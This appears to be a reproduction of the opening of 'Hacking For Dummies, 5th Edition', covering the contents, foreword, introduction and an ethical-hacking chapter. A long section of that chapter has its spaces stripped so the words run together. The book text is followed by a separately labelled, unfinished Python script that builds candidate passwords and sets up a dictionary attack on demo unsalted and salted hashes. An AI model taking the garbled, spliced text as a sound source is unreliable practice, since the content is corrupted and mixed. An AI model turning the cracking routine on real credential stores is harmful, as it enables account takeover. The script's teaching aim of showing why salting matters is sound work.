hacking for dummies - kevin beaver


Hacking For Dummies®, 5th Edition

Published by: John Wiley & Sons, Inc., 111 River Street, Hoboken, NJ 07030-5774, www.wiley.com

Copyright © 2016 by John Wiley & Sons, Inc., Hoboken, New Jersey

Published simultaneously in Canada


Library of Congress Control Number: 2015956627

ISBN 978-1-119-15468-6 (pbk); ISBN 978-1-119-15469-3 (ebk); ISBN 978-1-119-15470-9 (ebk)

Hacking For Dummies®

Visit www.dummies.com/cheatsheet/hacking to view this book’s cheat sheet.

Table of Contents

Cover
Foreword
Introduction
Who Should Read This Book?
About This Book
How to Use This Book
What You Don’t Need to Read
Foolish Assumptions
How This Book Is Organized
Icons Used in This Book
Where to Go from Here
Part I: Building the Foundation for Security Testing
Chapter 1: Introduction to Ethical Hacking
Straightening Out the Terminology
Recognizing How Malicious Attackers Beget Ethical Hackers
Understanding the Need to Hack Your Own Systems
Understanding the Dangers Your Systems Face
Obeying the Ethical Hacking Principles
Using the Ethical Hacking Process
Chapter 2: Cracking the Hacker Mindset
What You’re Up Against
Who Breaks into Computer Systems
Why They Do It
Planning and Performing Attacks
Maintaining Anonymity
Chapter 3: Developing Your Ethical Hacking Plan
Establishing Your Goals
Determining Which Systems to Hack
Creating Testing Standards
Selecting Security Assessment Tools
Chapter 4: Hacking Methodology
Setting the Stage for Testing
Seeing What Others See
Scanning Systems
Determining What’s Running on Open Ports
Assessing Vulnerabilities
Penetrating the System
Part II: Putting Security Testing in Motion
Chapter 5: Information Gathering
Gathering Public Information
Mapping the Network
Chapter 6: Social Engineering
Introducing Social Engineering
Starting Your Social Engineering Tests
Why Attackers Use Social Engineering
Understanding the Implications
Performing Social Engineering Attacks
Social Engineering Countermeasures
Chapter 7: Physical Security
Identifying Basic Physical Security Vulnerabilities
Pinpointing Physical Vulnerabilities in Your Office
Chapter 8: Passwords
Understanding Password Vulnerabilities
Cracking Passwords
General Password Cracking Countermeasures
Securing Operating Systems
Part III: Hacking Network Hosts
Chapter 9: Network Infrastructure Systems
Understanding Network Infrastructure Vulnerabilities
Choosing Tools
Scanning, Poking, and Prodding the Network
Detecting Common Router, Switch, and Firewall Weaknesses
Putting Up General Network Defenses
Chapter 10: Wireless Networks
Understanding the Implications of Wireless Network Vulnerabilities
Choosing Your Tools
Discovering Wireless Networks
Discovering Wireless Network Attacks and Taking Countermeasures
Chapter 11: Mobile Devices
Sizing Up Mobile Vulnerabilities
Cracking Laptop Passwords
Cracking Phones and Tablets
Part IV: Hacking Operating Systems
Chapter 12: Windows
Introducing Windows Vulnerabilities
Choosing Tools
Gathering Information About Your Windows Vulnerabilities
Detecting Null Sessions
Checking Share Permissions
Exploiting Missing Patches
Running Authenticated Scans
Chapter 13: Linux
Understanding Linux Vulnerabilities
Choosing Tools
Gathering Information About Your Linux Vulnerabilities
Finding Unneeded and Unsecured Services
Securing the .rhosts and hosts.equiv Files
Assessing the Security of NFS
Checking File Permissions
Finding Buffer Overflow Vulnerabilities
Checking Physical Security
Performing General Security Tests
Patching Linux
Part V: Hacking Applications
Chapter 14: Communication and Messaging Systems
Introducing Messaging System Vulnerabilities
Recognizing and Countering E-Mail Attacks
Understanding Voice over IP
Chapter 15: Web Applications and Mobile Apps
Choosing Your Web Security Testing Tools
Seeking Out Web Vulnerabilities
Minimizing Web Security Risks
Uncovering Mobile App Flaws
Chapter 16: Databases and Storage Systems
Diving Into Databases
Following Best Practices for Minimizing Database Security Risks
Opening Up About Storage Systems
Following Best Practices for Minimizing Storage Security Risks
Part VI: Security Testing Aftermath
Chapter 17: Reporting Your Results
Pulling the Results Together
Prioritizing Vulnerabilities
Creating Reports
Chapter 18: Plugging Security Holes
Turning Your Reports into Action
Patching for Perfection
Hardening Your Systems
Assessing Your Security Infrastructure
Chapter 19: Managing Security Processes
Automating the Ethical Hacking Process
Monitoring Malicious Use
Outsourcing Security Assessments
Instilling a Security-Aware Mindset
Keeping Up with Other Security Efforts
Part VII: The Part of Tens
Chapter 20: Ten Tips for Getting Security Buy-In
Cultivate an Ally and a Sponsor
Don’t Be a FUDdy Duddy
Demonstrate How the Organization Can’t Afford to Be Hacked
Outline the General Benefits of Security Testing
Show How Security Testing Specifically Helps the Organization
Get Involved in the Business
Establish Your Credibility
Speak on Management’s Level
Show Value in Your Efforts
Be Flexible and Adaptable
Chapter 21: Ten Reasons Hacking Is the Only Effective Way to Test
The Bad Guys Think Bad Thoughts, Use Good Tools, and Develop New Methods
IT Governance and Compliance Are More than High-Level Checklist Audits
Hacking Complements Audits and Security Evaluations
Customers and Partners Will Ask, ‘How Secure Are Your Systems?’
The Law of Averages Works Against Businesses
Security Assessments Improve the Understanding of Business Threats
If a Breach Occurs, You Have Something to Fall Back On
In-Depth Testing Brings Out the Worst in Your Systems
Combining the Best of Penetration Testing and Vulnerability Assessments Is What You Need
Proper Testing Can Uncover Weaknesses That Might Go Overlooked for Years
Chapter 22: Ten Deadly Mistakes
Not Getting Prior Approval
Assuming You Can Find All Vulnerabilities During Your Tests
Assuming You Can Eliminate All Security Vulnerabilities
Performing Tests Only Once
Thinking You Know It All
Running Your Tests Without Looking at Things from a Hacker’s Viewpoint
Not Testing the Right Systems
Not Using the Right Tools
Pounding Production Systems at the Wrong Time
Outsourcing Testing and Not Staying Involved
Appendix: Tools and Resources
Advanced Malware
Bluetooth
Certifications
Databases
Denial of Service Protection
Exploits
General Research Tools
Hacker Stuff
Keyloggers
Laws and Regulations
Linux
Live Toolkits
Log Analysis
Messaging
Miscellaneous
Mobile
Networks
Password Cracking
Patch Management
Security Education and Learning Resources
Security Methods and Models

Social Engineering and Phishing

Source Code Analysis
Statistics
Storage
System Hardening
User Awareness and Training
Voice over IP
Vulnerability Databases
Websites and Applications
Windows
Wireless Networks
About the Author
Cheat Sheet
Connect with Dummies
End User License Agreement

Foreword

There were no books on hacking when I became a penetration tester and security auditor for PricewaterhouseCoopers in 1995. There were tools, techniques, and procedures, though. While the tools have changed dramatically, the techniques and procedures have been remarkably stable, and Kevin Beaver has created the perfect introduction to hacking that incorporates the best procedures with the latest tools. Planning, footprint analysis, scanning, and attacking are all still required. Perhaps there is more emphasis on wireless and web hacking and less on things such as war dialing thanks to changes in the way companies and people are connected. The real value to extract from this book is in understanding the tools and becoming proficient in their use.

Pentesting, or hacking, is the best way to get into the rewarding field of IT security. It is open to anyone with a foundation in computing, coding, or networking. If you do not have a background in all three, you will quickly gain knowledge in the other disciplines because hacking takes you down many paths.

There was a time when a professional hacker had to be a jack-of-all-trades. Now there are thousands of subspecialties within the realm of hacking: mobile app security testing, web app security testing, network penetration, and OS-specific hacking for Mac OS X, Windows, Linux, and Android. Security researchers, specialists who discover new vulnerabilities, are having a big impact on the so-called Internet of Things (IoT) as they discover new ways to hack medical devices, automobiles, airplanes, and industrial control systems, which makes this field that much more exciting and relevant.

Hacking appeals to a special kind of person. Tinkerers, inventors, and just those who are fascinated by the way things work get into IT security through the hacking door.

As Kevin explains though, hacking as a profession requires discipline and careful record keeping, perhaps the hardest part for the sometimes brilliant amateur hackers—the ones who will stay glued to their consoles for 24 hours, scripting attacks and wending their way through a network until they hit gold.

For me, the most interesting type of hacking is what I have termed business process hacking. When formalized, business process hacking is an example of what Kevin calls knowledge-based hacking. It is best performed with an insider’s knowledge of architectures and technology and, most important, the business process. This is where you discover flaws in the way a business is built. Is there a third-party payment processor in the loop of an e-commerce site? Can a subscriber to an information resource abuse his access in ways a hacker cannot? Where are the “trust interfaces?” Is the only control at those interfaces: “We trust the user/system/supplier not to hack us?”

You see business process hacking every day. So-called Search Engine Optimization (SEO) experts figure out how to hack Google’s page rank algorithms and controls. Tickets to popular concerts and sporting events are sold out in minutes to bots that scarf them up for resale at a profit. Amazon sales ranks are hacked by authors who purchase their own books in quantity.

This book is your introduction to the challenging and engaging world of hacking IT systems. I predict three things:

1. Hacking will accelerate your career as you gain invaluable experience and become indispensable to your organization.
2. New doors will open for you. You will find that you have many options. You can join (or form) a consulting firm. You can move up the ranks inside your organization, perhaps to becoming the Chief Information Security Officer. You can join a vendor that designs and sells security tools in which you have gained proficiency.
3. You will never stop learning. Hacking is one of the few fields where you are never done.

Richard Stiennon
Chief Research Analyst, IT-Harvest
Author of There Will Be Cyberwar

Introduction

Welcome to Hacking For Dummies, 5th Edition. This book outlines—in plain English—computer hacker tricks and techniques that you can use to assess the security of your information systems, find the vulnerabilities that matter, and fix the weaknesses before criminal hackers and malicious insiders take advantage of them. This hacking is the professional, aboveboard, and legal type of security testing—which I often refer to as ethical hacking throughout the book.

Computer and network security is a complex subject and an ever-moving target. You must stay on top of it to ensure that your information is protected from the bad guys. That’s where the techniques and tools outlined in this book can help.

You can implement all the security technologies and other best practices possible, and your information systems might be secure—as far as you know. However, until you understand how malicious attackers think, apply that knowledge, and use the right tools to assess your systems from their point of view, it’s practically impossible to have a true sense of how secure your information really is.

Ethical hacking, or more simply, “security assessments”—which encompasses formal and methodical penetration testing, white hat hacking, and vulnerability testing—is necessary to find security flaws and to help validate that your information systems are truly secure on an ongoing basis. This book provides you with the knowledge to implement a security assessment program successfully, perform proper security checks, and put the proper countermeasures in place to keep external hackers and malicious users in check.

Who Should Read This Book?

Disclaimer: If you choose to use the information in this book to hack or break into computer systems maliciously and without authorization, you’re on your own. Neither I (the author) nor anyone else associated with this book shall be liable or responsible for any unethical or criminal choices that you might make and execute using the methodologies and tools that I describe. This book is intended solely for information technology (IT) and information security professionals to test information security—either on your own systems or on a client’s systems—in an authorized fashion.

Okay, now that that’s out of the way, it’s time for the good stuff! This book is for you if you’re a network administrator, information security manager, security consultant, security auditor, compliance manager, or otherwise interested in finding out more about testing computer systems and IT operations to make things more secure.

As the person performing well-intended information security assessments, you can detect and point out security holes that might otherwise be overlooked. If you’re performing these tests on your systems, the information you uncover in your tests can help you win over management and prove that information security really is a business issue to be taken seriously. Likewise, if you’re performing these tests for your clients, you can help find security holes that can be plugged before the bad guys have a chance to exploit them.

The information in this book helps you stay on top of the security game and enjoy the fame and glory of helping your organization and clients prevent bad things from happening to their information and network environment.

About This Book

Hacking For Dummies, 5th Edition, is a reference guide on hacking your systems to improve security and help minimize business risks. The security testing techniques are based on written and unwritten rules of computer system penetration testing, vulnerability testing, and information security best practices. This book covers everything from establishing your hacking plan to testing your systems to plugging the holes and managing an ongoing security testing program. Realistically, for many networks, operating systems, and applications, thousands of possible hacks exist. I don’t cover them all but I do cover the major ones on various platforms and systems that I believe contribute to the most security problems in business today. Whether you need to assess security vulnerabilities on a small home office network, a medium-sized corporate network, or across large enterprise systems, Hacking For Dummies, 5th Edition, provides the information you need.

How to Use This Book

This book includes the following features:

Various technical and nontechnical tests and their detailed methodologies
Specific countermeasures to protect against hacking

Before you start testing your systems, familiarize yourself with the information in Part I so you’re prepared for the tasks at hand. The adage “if you fail to plan, you plan to fail” rings true for the ethical hacking process. You must have a solid game plan in place if you’re going to be successful.

What You Don’t Need to Read

Depending on your computer and network configurations, you may be able to skip chapters. For example, if you aren’t running Linux or wireless networks, you can skip those chapters. Just be careful. You may think you’re not running certain systems, but they could very well be on your network, somewhere, waiting to be exploited.

Foolish Assumptions

I make a few assumptions about you, the aspiring IT or security professional:

You are familiar with basic computer-, network-, and information-security concepts and terms.
You have access to a computer and a network on which to use these techniques and tools.
You have permission to perform the hacking techniques described in this book.

How This Book Is Organized

This book is organized into seven modular parts, so you can jump around from one part to another as needed. Each chapter provides practical methodologies and practices you can use as part of your security testing efforts, including checklists and references to specific tools you can use, as well as resources on the Internet.

Part I: Building the Foundation for Security Testing

This part covers the fundamental aspects of security assessments. It starts with an overview of the value of ethical hacking and what you should and shouldn’t do during the process. You get inside the malicious mindset and discover how to plan your security testing efforts. This part covers the steps involved in the ethical hacking process, including how to choose the proper tools.

Part II: Putting Security Testing in Motion

This part gets you rolling with the security testing process. It covers several well-known and widely used hack attacks, including information gathering, social engineering, and cracking passwords, to get your feet wet. This part covers the human and physical elements of security, which tend to be the weakest links in any information security program. After you plunge into these topics, you’ll know the tips and tricks required to perform common general security tests against your systems, as well as specific countermeasures to keep your information systems secure.

Part III: Hacking Network Hosts

Starting with the larger network in mind, this part covers methods to test your systems for various well-known network infrastructure vulnerabilities. From weaknesses in the TCP/IP protocol suite to wireless network insecurities, you find out how networks are compromised by using specific methods of flawed network communications, along with various countermeasures that you can implement to avoid becoming a victim. I then delve down into mobile devices and show how smartphones, tablets, and the like can be exploited.

Part IV: Hacking Operating Systems

Practically all operating systems have well-known vulnerabilities that hackers often exploit. This part jumps into hacking the widely-used operating systems: Windows and Linux. The hacking methods include scanning your operating systems for vulnerabilities and enumerating the specific hosts to gain detailed information. This part also includes information on exploiting well-known vulnerabilities in these operating systems, taking over operating systems remotely, and specific countermeasures that you can implement to make your operating systems more secure.

Part V: Hacking Applications

Application security is a critical area of focus these days. An increasing number of attacks—which are often able to bypass firewalls, intrusion prevention systems, and antivirus software—are aimed directly at web, mobile, and related applications. This part discusses hacking specific business applications, including coverage of messaging systems, web applications, mobile apps, and databases, along with practical countermeasures that you can put in place to make your systems more secure.

Part VI: Security Testing Aftermath

After you perform your security testing, what do you do with the information you gather? Shelve it? Show it off? How do you move forward? This part answers these questions and more. From developing reports for management to remediating the security flaws that you discover to establishing procedures for your ongoing vulnerability testing efforts, this part brings the security assessment process full circle. This information not only ensures that your effort and time are well spent, but also is evidence that information security is an essential element for success in any business that depends on computers and information technology.

Part VII: The Part of Tens

This part contains tips to help ensure the success of your information security program. You find out how to get management to buy into your program so you can get going and start protecting your systems. This part also includes the top ten ethical hacking mistakes you absolutely must avoid.

The appendix, which also appears in this part, provides a one-stop reference listing of ethical hacking tools and resources.

Icons Used in This Book

This icon points out information that is worth committing to memory.

This icon points out information that could have a negative impact on your ethical hacking efforts—so please read it!

This icon refers to advice that can help highlight or clarify an important point.

This icon points out technical information that is interesting but not vital to your understanding of the topic being discussed.

Where to Go from Here

The more you know about how external hackers and rogue insiders work and how your systems should be tested, the better you’re able to secure your computer and network systems. This book provides the foundation that you need to develop and maintain a successful security assessment program in order to minimize business risks.

Keep in mind that the high-level concepts of security testing won’t change as often as the specific vulnerabilities you protect against. Ethical hacking will always remain both an art and a science in a field that’s ever-changing. You must keep up with the latest hardware and software technologies, along with the various vulnerabilities that come about month after month and year after year.

You won’t find a single best way to hack your systems, so tweak this information to your heart’s content and, as I’ve always said, happy hacking!

Part I

Building the Foundation for Security Testing


In this part…

Your mission is to find the holes in your network so you can fix them before the bad guys exploit them. It’s that simple. This mission will be fun, educational, and most likely entertaining. It will certainly be an eye-opening experience. The cool part is that you can emerge as the hero, knowing that your organization will be better protected against malicious hackers and insider attacks and less likely to experience a breach and have its name smeared across the headlines.

If you’re new to security testing, this is the place to begin. The chapters in this part get you started with information on what to do and how to do it when you’re hacking your own systems. Oh, and you find out what not to do as well. This information will guide you through building the foundation for your security testing program. This foundation will keep you on the right path and off any one-way dead-end streets. This mission is indeed possible—you just have to get your ducks in a row first.

Chapter1

IntroductiontoEthicalHackingInThisChapter

Understandinghackers’andmalicioususers’objectives

Examininghowtheethicalhackingprocesscameabout

Understandingthedangersyourcomputersystemsface

Startingtousetheethicalhackingprocessforsecuritytesting

Thisbookisabouttestingyourcomputersandnetworksforsecurityvulnerabilitiesandpluggingtheholesyoufindbeforethebadguysgetachancetoexploitthem.

StraighteningOuttheTerminologyMostpeoplehaveheardofhackersandmalicioususers.Manyhaveevensufferedtheconsequencesoftheircriminalactions.Sowhoarethesepeople?Andwhydoyouneedtoknowaboutthem?Thenextfewsectionsgiveyouthelowdownontheseattackers.

Inthisbook,Iusethefollowingterminology:

Hackers(orexternalattackers)trytocompromisecomputers,sensitiveinformation,andevenentirenetworksforill-gottengains—usuallyfromtheoutside—asunauthorizedusers.Hackersgoforalmostanysystemtheythinktheycancompromise.Somepreferprestigious,well-protectedsystems,buthackingintoanyone’ssystemincreasesanattacker’sstatusinhackercircles.

Malicioususers(orinternalattackers)trytocompromisecomputersandsensitiveinformationfromtheinsideasauthorizedand“trusted”users.Malicioususersgoforsystemstheybelievetheycancompromiseforill-gottengainsorrevenge.

Maliciousattackersare,generallyspeaking,bothhackersandmalicioususers.Forthesakeofsimplicity,IrefertobothashackersandspecifyhackerormalicioususeronlywhenIneedtodifferentiateanddrilldownfurtherintotheiruniquetools,techniques,andwaysofthinking.

Ethicalhackers(orgoodguys)hacksystemstodiscovervulnerabilitiestoprotectagainstunauthorizedaccess,abuse,andmisuse.Informationsecurityresearchers,consultants,andinternalstafffallintothiscategory.

DefininghackerHackerhastwomeanings:

Traditionally,hackersliketotinkerwithsoftwareorelectronicsystems.Hackersenjoyexploringandlearninghowcomputersystemsoperate.Theylovediscoveringnewwaystowork—bothmechanicallyandelectronically.Inrecentyears,hackerhastakenonanewmeaning—someonewhomaliciouslybreaksintosystemsforpersonalgain.Technically,thesecriminalsarecrackers(criminalhackers).Crackersbreakinto,orcrack,systemswithmaliciousintent.Thegaintheyseekcouldbefame,intellectualproperty,profit,orevenrevenge.Theymodify,delete,andstealcriticalinformationaswellastakeentirenetworksoffline,oftenbringinglargecorporationsandgovernmentagenciestotheirknees.

Thegood-guy(whitehat)hackersdon’tlikebeinglumpedinthesamecategoryasthebad-guy(blackhat)hackers.(Incaseyou’recurious,thewhitehatandblackhattermscomefromoldWesternTVshowsinwhichthegoodguysworewhitecowboyhatsandthebadguysworeblackcowboyhats.)Grayhathackersarealittlebitofboth.

Whateverthecase,mostpeoplehaveanegativeconnotationofthewordhacker.

Manymalicioushackersclaimthattheydon’tcausedamagebutinsteadhelpothersforthe“greatergood”ofsociety.Yeah,right.Malicioushackersareelectronicmiscreantsanddeservetheconsequencesoftheiractions.

Becarefulnottoconfusecriminalhackerswithsecurityresearchers.Researchersnotonlyhackaboveboardanddeveloptheamazingtoolsthatwegettouseinourwork,butalsothey(usually)takeresponsiblestepstodisclosetheirfindingsandpublishtheircode.

DefiningmalicioususerMalicioususer—meaningarogueemployee,contractor,intern,orotheruserwhoabuseshisorhertrustedprivileges—isacommonterminsecuritycirclesandinheadlinesaboutinformationbreaches.Theissueisn’tnecessarilyusers“hacking”internalsystems,butratheruserswhoabusethecomputeraccessprivilegesthey’vebeengiven.Usersferretthroughcriticaldatabasesystemstogleansensitiveinformation,e-mailconfidentialclientinformationtothecompetitionorelsewheretothecloud,ordeletesensitivefilesfromserversthattheyprobablydidn’tneedtohaveaccesstointhefirstplace.There’salsotheoccasionalignorantinsiderwhoseintentisnotmaliciousbutwhostillcausessecurityproblemsbymoving,deleting,orcorruptingsensitiveinformation.Evenaninnocent“fat-finger”onthekeyboardcanhavedireconsequencesinthebusinessworld.

MalicioususersareoftentheworstenemiesofITandinformationsecurityprofessionalsbecausetheyknowexactlywheretogotogetthegoodsanddon’tneedtobecomputersavvytocompromisesensitiveinformation.Theseusershavetheaccesstheyneedandthemanagementtruststhem—oftenwithoutquestion.

So,whataboutthatEdwardSnowdenguy—theformerNationalSecurityAgencyemployeewhorattedouthisownemployer?That’sacomplicatedsubjectandItalkabouthackermotivationsinChapter2.RegardlessofwhatyouthinkofSnowden,heabusedhisauthorityandviolatedthetermsofhisnon-disclosureagreement.

RecognizingHowMaliciousAttackersBegetEthicalHackers

Youneedprotectionfromhackershenanigans;youhavetobecomeassavvyastheguystryingtoattackyoursystems.Atruesecurityassessmentprofessionalpossessestheskills,mindset,andtoolsofahackerbutisalsotrustworthy.Heorsheperformsthehacksassecuritytestsagainstsystemsbasedonhowhackersmightwork.

Ethicalhacking—whichencompassesformalandmethodicalpenetrationtesting,whitehathacking,andvulnerabilitytesting—involvesthesametools,tricks,andtechniquesthatcriminalhackersuse,butwithonemajordifference:Ethicalhackingisperformedwiththetarget’spermissioninaprofessionalsetting.Theintentofethicalhackingistodiscovervulnerabilitiesfromamaliciousattacker’sviewpointtobettersecuresystems.Ethicalhackingispartofanoverallinformationriskmanagementprogramthatallowsforongoingsecurityimprovements.Ethicalhackingcanalsoensurethatvendors’claimsaboutthesecurityoftheirproductsarelegitimate.

Ifyouperformethicalhackingtestsandwanttoaddanothercertificationtoyourcredentials,youmightwanttoconsiderbecomingaCertifiedEthicalHacker(C|EH)throughacertificationprogramsponsoredbyEC-Council.Seewww.eccouncil.orgformoreinformation.LiketheCertifiedInformationSystemsSecurityProfessional(CISSP),theC|EHcertificationhasbecomeawell-knownandrespectedcertificationintheindustry.It’sevenaccreditedbytheAmericanNationalStandardsInstitute(ANSI17024).OtheroptionsincludetheSANSGlobalInformationAssuranceCertification(GIAC)programandtheOffensiveSecurityCertifiedProfessional(OSCP)program—acompletelyhands-onsecuritytestingcertification.Ilovethatapproachasalltoooften,peopleperformingthistypeofworkdon’thavetheproperhands-onexperiencetodoitwell.Seewww.giac.organdwww.offensive-security.comformoreinformation.

EthicalhackingversusauditingManypeopleconfusesecuritytestingviatheethicalhackingapproachwithsecurityauditing,buttherearebigdifferences,namelyintheobjectives.Securityauditinginvolvescomparingacompany’ssecuritypolicies(orcompliancerequirements)towhat’sactuallytakingplace.Theintentofsecurityauditingistovalidatethatsecuritycontrolsexist—typicallyusingarisk-basedapproach.Auditingofteninvolvesreviewingbusinessprocessesand,inmanycases,mightnotbeverytechnical.Ioftenrefertosecurityauditsassecuritychecklistsbecausethey’reusuallybasedon(youguessedit)checklists.

Notallauditsarehigh-level,butmanyoftheonesI’veseen(especiallyaroundPCIDSS[PaymentCardIndustryDataSecurityStandard]compliance)arequitesimplistic—oftenperformedbypeoplewhohavenotechnicalcomputer,network,andapplicationexperienceor,worse,theyworkoutsideofITaltogether!

Conversely,securityassessmentsbasedaroundethicalhackingfocusonvulnerabilitiesthatcanbeexploited.Thistestingapproachvalidatesthatsecuritycontrolsdonotexistorareineffectualatbest.Ethicalhackingcanbebothhighlytechnicalandnontechnical,andalthoughyoudouseaformalmethodology,ittendstobeabitlessstructuredthanformalauditing.Whereauditingisrequired(suchasfortheISO9001and27001certifications)inyourorganization,youmightconsiderintegratingtheethicalhackingtechniquesIoutlineinthisbookintoyourIT/securityauditprogram.Theycomplementoneanotherreallywell.

PolicyconsiderationsIfyouchoosetomakeethicalhackinganimportantpartofyourbusiness’sinformationriskmanagementprogram,youreallyneedtohaveadocumentedsecuritytestingpolicy.Suchapolicyoutlineswho’sdoingthetesting,thegeneraltypeoftestingthatisperformed,andhowoftenthetestingtakesplace.SpecificproceduresforcarryingoutyoursecuritytestscouldoutlinethemethodologiesIcoverinthisbook.Youmightalsoconsidercreatingasecuritystandardsdocumentthatoutlinesthespecificsecuritytestingtoolsthatareusedandspecificpeopleperformingthetesting.Youmightalsoliststandardtestingdates,suchasonceperquarterforexternalsystemsandbiannualtestsforinternalsystems—whateverworksforyourbusiness.

ComplianceandregulatoryconcernsYourowninternalpoliciesmightdictatehowmanagementviewssecuritytesting,butyoualsoneedtoconsiderthestate,federal,andinternationallawsandregulationsthataffectyourbusiness.Inparticular,theDigitalMillenniumCopyrightAct(DMCA)sendschillsdownthespinesoflegitimateresearchers.Seewww.eff.org/issues/dmcaforeverythingtheDMCAhastooffer.

ManyofthefederallawsandregulationsintheUnitedStates—suchastheHealthInsurancePortabilityandAccountabilityAct(HIPAA),HealthInformationTechnologyforEconomicandClinicalHealth(HITECH)Act,Gramm-Leach-BlileyAct(GLBA),NorthAmericanElectricReliabilityCorporation(NERC)CriticalInfrastructureProtection(CIP)requirements,andPCIDSS—requirestrongsecuritycontrolsandconsistentsecurityevaluations.RelatedinternationallawssuchastheCanadianPersonalInformationProtectionandElectronicDocumentsAct(PIPEDA),theEuropeanUnion’sDataProtectionDirective,andJapan’sPersonalInformationProtectionAct(JPIPA)arenodifferent.Incorporatingyoursecuritytestsintothesecompliancerequirementsisagreatwaytomeetthestateandfederalregulationsand

beefupyouroverallinformationsecurityandprivacyprogram.

Understanding the Need to Hack Your Own Systems

To catch a thief, you must think like a thief. That’s the basis for ethical hacking. Knowing your enemy is absolutely critical. The law of averages works against security. With the increased number of hackers and their expanding knowledge, and the growing number of system vulnerabilities and other unknowns, eventually all computer systems and applications will be hacked or compromised in some way. Protecting your systems from the bad guys — and not just the generic vulnerabilities that everyone knows about — is absolutely critical. When you know hacker tricks, you find out how vulnerable your systems really are.

Hacking preys on weak security practices and undisclosed vulnerabilities. More and more research, such as the annual Verizon Data Breach Investigations Report (www.verizonenterprise.com/DBIR), is showing that long-standing, known vulnerabilities are also being targeted. Firewalls, encryption, and passwords can create a false feeling of safety. These security systems often focus on high-level vulnerabilities, such as basic access control, without affecting how the bad guys work. Attacking your own systems to discover vulnerabilities — especially the low-hanging fruit that gets so many people into trouble — helps make them more secure. Ethical hacking is a proven method of greatly hardening your systems from attack. If you don’t identify weaknesses, it’s only a matter of time before the vulnerabilities are exploited.

As hackers expand their knowledge, so should you. You must think like them and work like them to protect your systems from them. As the ethical hacker, you must know the activities that hackers carry out and how to stop their efforts. Knowing what to look for and how to use that information helps you to thwart hackers’ efforts.

You don’t have to protect your systems from everything. You can’t. The only protection against everything is to unplug your computer systems and lock them away so no one can touch them — not even you. But doing so is not the best approach to information security, and it’s certainly not good for business! What’s important is to protect your systems from known vulnerabilities and common attacks, which happen to be some of the most overlooked weaknesses in most organizations.

Anticipating all the possible vulnerabilities you’ll have in your systems and business processes is impossible. You certainly can’t plan for all types of attacks — especially the unknown ones. However, the more combinations you try and the more you test whole systems instead of individual units, the better your chances are of discovering vulnerabilities that affect your information systems in their entirety.

Don’t take your security testing too far, though; hardening your systems from unlikely attacks makes little sense. For instance, if you don’t have a lot of foot traffic in your office and no internal web server running, you might not have as much to worry about as a cloud service provider might have.

Your overall goals for security testing are to

- Prioritize your systems so you can focus your efforts on what matters.
- Hack your systems in a nondestructive fashion.
- Enumerate vulnerabilities and, if necessary, prove to management that vulnerabilities exist and can be exploited.
- Apply results to remove the vulnerabilities and better secure your systems.

Understanding the Dangers Your Systems Face

It’s one thing to know generally that your systems are under fire from hackers around the world and malicious users around the office; it’s another to understand the specific attacks against your systems that are possible. This section discusses some well-known attacks but is by no means a comprehensive listing.

Many security vulnerabilities aren’t critical by themselves. However, exploiting several vulnerabilities at the same time can take its toll on a system or network environment. For example, a default Windows OS configuration, a weak SQL Server administrator password, or a server hosted on a wireless network might not be major security concerns by themselves — but someone exploiting all three of these vulnerabilities at the same time could lead to sensitive information disclosure and more.

Complexity is the enemy of security.

The possible vulnerabilities and attacks have grown enormously in recent years because of virtualization, cloud computing, and even social media. These three things alone have added immeasurable complexity to your IT environment.

Nontechnical attacks

Exploits that involve manipulating people — end users and even yourself — are the greatest vulnerability within any computer or network infrastructure. Humans are trusting by nature, which can lead to social engineering exploits. Social engineering is the exploitation of the trusting nature of human beings to gain information — often via e-mail phishing — for malicious purposes. Check out Chapter 6 for more information about social engineering and how to guard your systems against it.

Other common and effective attacks against information systems are physical. Hackers break into buildings, computer rooms, or other areas containing critical information or property to steal computers, servers, and other valuable equipment. Physical attacks can also include dumpster diving — rummaging through trash cans and dumpsters for intellectual property, passwords, network diagrams, and other information.

Network infrastructure attacks

Attacks against network infrastructures can be easy to accomplish because many networks can be reached from anywhere in the world via the Internet. Some examples of network infrastructure attacks include the following:

- Connecting to a network through an unsecured wireless access point attached behind a firewall
- Exploiting weaknesses in network protocols, such as TCP/IP and Secure Sockets Layer (SSL)
- Flooding a network with too many requests, creating a denial of service (DoS) for legitimate requests
- Installing a network analyzer on a network segment and capturing every packet that travels across it, revealing confidential information in cleartext

Operating system attacks

Hacking an operating system (OS) is a preferred method of the bad guys. OS attacks make up a large portion of attacks simply because every computer has an operating system, and OSes are susceptible to many well-known exploits, including vulnerabilities that remain unpatched years later.

Occasionally, some operating systems that tend to be more secure out of the box — such as the old-but-still-out-there Novell NetWare, OpenBSD, and IBM Series i — are attacked, and vulnerabilities turn up. But hackers tend to prefer attacking Windows, Linux, and, more recently, Mac OS X, because they’re more widely used.

Here are some examples of attacks on operating systems:

- Exploiting missing patches
- Attacking built-in authentication systems
- Breaking file system security
- Cracking passwords and weak encryption implementations
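The last item on that list is the one you can reproduce on a laptop. The following Python script is an added example, not code from the book or its author; the accounts, passwords and wordlist are constructed for the demo, and the function and constant names are mine. It runs a small rule-based dictionary attack against the same three accounts stored two ways: as unsalted SHA-256, where one hash per candidate is checked against every account at once, and as salted PBKDF2, where each candidate has to be re-derived for each account.

```python
"""Dictionary attack against a constructed password-hash dump.

Added example, not from the book. It contrasts an unsalted fast hash
(one hash per candidate covers every account) with a salted, iterated
KDF (every candidate must be re-derived per account). All accounts,
passwords and wordlist entries are constructed for the demo.
"""
import hashlib
import hmac
import os
from typing import Dict, Iterator, List, Tuple

# Constructed wordlist; a real one has millions of entries.
WORDLIST: List[str] = ["password", "letmein", "summer", "welcome", "qwerty"]

# Kept low so the demo finishes quickly; production uses far higher counts
# (or a memory-hard KDF such as Argon2/scrypt, or bcrypt).
ITERATIONS = 10_000


def mangle(word: str) -> Iterator[str]:
    """Rule-based candidate generation: case variants plus common suffixes."""
    seen = set()
    for base in (word, word.capitalize(), word.upper()):
        for cand in (base, base + "1", base + "123", base + "!",
                     base + "2015", base + "2016"):
            if cand not in seen:
                seen.add(cand)
                yield cand


def sha256_hex(password: str) -> str:
    """Unsalted SHA-256: fast, and identical for identical passwords."""
    return hashlib.sha256(password.encode()).hexdigest()


def pbkdf2(password: str, salt: bytes) -> bytes:
    """Salted, iterated derivation: same password, different digest per salt."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


def make_dumps(creds: Dict[str, str]):
    """Build both storage formats from the constructed plaintext accounts."""
    unsalted = {user: sha256_hex(pw) for user, pw in creds.items()}
    salted: Dict[str, Tuple[bytes, bytes]] = {}
    for user, pw in creds.items():
        salt = os.urandom(16)
        salted[user] = (salt, pbkdf2(pw, salt))
    return unsalted, salted


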